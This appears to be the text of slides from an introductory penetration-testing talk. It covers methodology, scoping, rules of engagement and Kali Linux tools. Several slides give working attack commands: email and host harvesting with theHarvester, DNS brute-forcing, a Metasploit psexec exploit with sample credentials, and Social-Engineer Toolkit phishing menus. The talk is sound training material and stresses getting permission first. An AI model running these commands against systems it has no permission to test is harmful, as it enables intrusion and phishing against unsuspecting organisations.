Introduction to Penetration Testing Paul D.

(1)

Wilkinson Technology

Introduction to Penetration

Testing

Paul D. Robertson

[email protected]

@compuwar

(2)

Speaker Bio

Paul D. Robertson

Chief Technology Officer

and Chief Information

Security Officer

Wilkinson Technology

Services

(3)

Penetration Testing- Definition

NIST SP-800-115 - Technical Guide to Information Security Testing and Assessment

Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

(4)

Caveats

Know the legality of what you’re doing before you do it.

Get Permission.

Just being able to run canned tools isn’t usually enough.

Worry about 3

rd

parties.

Always test your tools in a controlled environment.

Insurance is a good thing.

(5)

OSSTMM

Open Source Security Testing Methodology Manual

One of many methodologies- none of them canonical

(6)

Defining A Security Test

1. Define what you want to protect. These are

the

assets

. The protection mechanisms for these

assets are the

Controls

you will test to identify

Limitations

.

2. Identify the area around the assets which

includes the protection mechanisms and the

processes or services built around the assets. This is

where interaction with assets will take place. This is

your

engagement zone

.

(7)

Defining A Security Test

3. Define everything outside the engagement

zone that you need to keep your assets operational.

This may include things you may not be able to

directly influence like electricity, food, water, air,

stable ground, information, legislation, regulations

and things you may be able to work with like dryness,

warmth, coolness, clarity, contractors, colleagues,

branding, partnerships, and so on. Also count that

which keeps the infrastructure operational like

processes, protocols, and continued resources. This is

your test

scope

.

(8)

Defining A Security Test (Cont.)

4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside,

department A to department B, etc. These are your

vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.

(9)

Defining A Security Test (Cont.)

5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways,

however here they have been classified by function as five

channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.

(10)

Defining A Security Test (Cont.)

6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.

(11)

Defining A Security Test (Cont.)

7. Assure the security test you have defined is in

compliance to the

Rules of Engagement

, a

guideline to assure the process for a proper security

test without creating misunderstandings,

(12)

Scope

The scope is the total possible operating security

environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and

Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.

(13)

Scope

Classes are used to define an area of study,

investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a

relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.

(14)

Scope (Cont.)

It must be made clear that a security analysis must be

restricted to that which is within a type of certainty (not to be confused with risk which is not a certainty but a

probability). These restrictions include:

1.Non-events such as a volcano eruption where no volcano exists

2.Non-impact like moonlight through data center window 3. Global-impacting such as a catastrophic meteor impact.

While a thorough security audit requires testing all five channels, realistically, tests are conducted and

categorized by the required expertise of the Analyst and the required equipment for the audit.

(15)

Scope (Cont.)

Classes:

Physical Security (PHYSSEC)

Spectrum Security (SPECSEC)

(16)

Scope (Cont.)

Physical Security Channels

Human: Comprises the human element of communication where interaction is either physical or psychological.

Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.

(17)

Scope (Cont.)

Spectrum Security Channel

Wireless: Comprises all electronic communications,

signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic

communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.

(18)

Common Test Types

Blind: No prior target knowledge.

Double Blind: No prior target knowledge and no target notification.

Gray Box: Limited target knowledge

Double Gray Box: Limited target knowledge, target knows timeframe of test.

Tandem: Full information on both sides.

Reversal: Full information for attacker, no information for defenders.

(19)

Rules of Engagement

What’s in scope?

What’s allowed?

NDAs, contracts, get out of jail free cards…

Required reporting elements.

(20)

Testing

Passive information collection

Active information collection

Actively test assets

(21)

Tools

Toolbox

(22)

Test Environment

MSDN/Technet

Virtual/Physical

Test Software Revisions!

Keep old versions!

(23)

Toolbox

Kali Linux is the main tool we’ll be discussing

Replacement for Backtrack Linux

Designed for Pentesting

Debian-based

(24)

Kali Linux

Lives at http://www.kali.org

(25)

Kali Linux

Check your checksum after downloading! Linux: sha1sum OSX: shasum

Validate SHA1 file with GPG- it’s in the docs- next slide…

Can run “live” from DVD or USB or install in VM or on hardware Can add persistence to USB installs

Dual boot isn’t always trivial, neither is EFI boot

If you run in a VM, you need a USB-based wireless adapter to attack wireless networks.

Kernels are already patched for wireless injection ARM versions available

(26)

Kali Linux

RTFM! http://docs.kali.org http://docs.kali.org/pdf/kali-book-en.pdf http://forums.kali.org Irc.freenode.net #kali-linux

(27)

Kali Linux

Caveats:

Not really designed for complete newbies

Updates routinely break things- snapshot VMs Use pass-through, not NAT for VMs

There are more than 300 tools in the distribution- You won’t always find information for them all

(28)

Kali Linux

Relatively easy to build your own custom version

Unlike Backtrack, everything is filesystem standard- no more of that /pentest stuff!

Command help sometimes off a bit- just use the command directly, It’s in the path.

(29)

Kali Linux

Relatively easy to build your own custom version from within.

Unlike Backtrack, everything is filesystem standard- no more of that /pentest stuff!

Command help sometimes off a bit- just use the command directly, It’s in the path.

(30)

Kali Linux

Good Targets:

https://www.pentesterlab.com/ http://vulnhub.com/

(31)

theharvester

Applications->Kali Linux->Information Gathering->OSINT Analysis Example is wrong- no need for ./ or .py

theharvester –d targetdomain –b google –l 500 Theharvester –d targetdomain –b linkedin

Using –b all will sometimes give strange results Can redirect to a file

(32)

theharvester

theharvester –d mydomain.foo –b all [+] Emails found: [email protected] [email protected] [email protected] [email protected] p…@mydomain.foo [email protected]

(33)

theharvester

theharvester –d mydomain.foo –b all [+] Hosts found in search engines: ---127.0.0.110:www. mydomain.foo 127.0.0.110:dns1. mydomain.foo 127.0.0.22:dns2. mydomain.foo 127.10.0.110:www. mydomain.foo [+] Virtual hosts ---127.0.0.110 otherdomain.bar 127.0.0.110 yetanother.baz 127.0.0.110 otherdomain.baz 127.0.0.110 www.mydomain.foo

(34)

theharvester

I have found that therarvester finds things in Google that the metasploit auxillary/gather/search_email_collector

(35)

DNS

dnsrecon –d mydomain dnsenum mydomain

All allow usage of a wordlist to enumerate potential hostnames. Wordlists live in /usr/share/wordlist

rockyou is gzipped

(36)

DNS

In metasploit

use auxiliary/gather/enum_dns set DOMAIN=mydomain

set ENUM_BRT true

set WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt set ENUM_AXFR false

(37)

OpenVAS

Good (not great) vulnerability scanner

Forked from Nessus before everything went commercial

Run the setup first to set up the admin password and start the engines GSD is difficult to navigate- use GSA if you can

Use domain credentials if you can and filter for high and medium vulns Use openvas-nvt-sync before starting up each time

(38)

SET

se-toolkit

1)Social-Engineering Attacks

2)Fast-Track Penetration Testing 3)Third Party Modules

4)Update the Metasploit Framework 5)Update the Social-Engineer Toolkit 6)Update SET configuration

(39)

SET

se-toolkit

1)Spear-Phishing Attack Vectors 2)Website Attack Vectors

3)Infectious Media Generator 4)Create a Payload and Listener 5)Mass Mailer Attack

6)Arduino-Based Attack Vector 7)SMS Spoofing Attack Vector

8)Wireless Access Point Attack Vector 9)QRCode Generator Attack Vector 10)Powershell Attack Vectors

(40)

Fern Wi-Fi Cracker

GUI tool

WPA, WPA2 and WEP Wordlists supported

(41)

Metasploit

service postgresql start service metasploit start msfconsole

(42)

Metasploit

use exploit/windows/smb/psexec set LHOST 10.0.0.1

set RHOST 10.0.0.127 set SMBUser victim set SMBPass password exploit

(43)

Metasploit

(44)

Metasploit

(45)

(46)

Teensy 3.0

$20.00

Can act as a USB HID

Add teensydurino code to arduino to load sketches

Commonly plays as an Apple USB keyboard, which is welcomed by Win*, OSX and most GUI Linuxes

(47)

Kautilya

http://code.google.com/kautilya Contains many Teensy payloads

(48)

Demo Time

(49)